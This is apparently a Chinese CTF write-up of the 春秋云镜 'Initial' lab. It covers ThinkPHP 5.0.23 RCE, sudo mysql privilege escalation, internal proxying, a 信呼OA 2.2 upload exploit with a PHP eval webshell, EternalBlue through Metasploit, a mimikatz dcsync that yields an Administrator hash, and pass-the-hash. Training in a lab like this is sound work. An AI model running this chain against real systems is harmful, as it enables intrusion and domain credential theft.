春秋云镜-Initial
flag1:
fscan扫一下,发现有thinkphp的洞
thinkphp-rce
thinkphpGUI嗦一下,发现是ThinkPHP 5.0.23 RCE
蚁剑连接,找到flag的位置,但是权限不够
检验一下,发现是www-data权限,然后sudo -l
看一下可以用sudo执行的命令
1 | User www-data may run the following commands on ubuntu-web01: |
sudo提权-mysql
可以用数据库执行命令sudo mysql -e '\!'
拿到第一段flag
ifconfig
发现内网网段为172.22.1.*
,然后上传fscan去扫内网(记得要给fscan可执行权限)
flag2:
先来整理一下
1 | MS17-010 172.22.1.21 |
搭建内网代理:
为了访问到内网,我们要先搭建内网代理,此处用stowaway
搭建,并且socket监听一个端口
然后用proxifier连接代理,注意修改rule里的target_hosts
连接完成后,即可访问
这里是弱口令admin123
信呼OA2.2-RCE
查询漏洞发现信呼2.2版本是存在文件上传漏洞的,首页通知中也有说明版本为2.2
找了篇文章来打:[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE_信呼协同办公系统弱口令-CSDN博客
1.php:记得改为POST
1 | eval($_POST["1"]); |
exp.py:修改URL和adminuser及adminpass
1 | import requests |
由于此时本机已经用proxifier连接了代理,所以本地直接运行也是可以的
我这里在kali里运行,先配置proxychains,写入socket5 vps地址
1 | proxychains python exp.py |
此时访问发现存在:
直接蚁剑连接即可,找到第二段flag
flag3:
再来回顾一下:
1 | MS17-010 172.22.1.21 |
那么接下来对172.22.1.21
下手,MS17-010
即永恒之蓝,可以直接用msf一把梭(我用的kali的)
1 | proxychains msfconsole |
此时就是一个系统权限
然后就要尝试抓取用户的哈希进行PTH
dcsync
先用load kiwi
加载Mimikatz
然后在获取权限的域成员主机上执行kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
得到Administrator的哈希:10cf89a850fb1cdbe6bb432b859164c8
PTH
进行哈希传递
发现传递成功,接下来即可执行命令拿flag了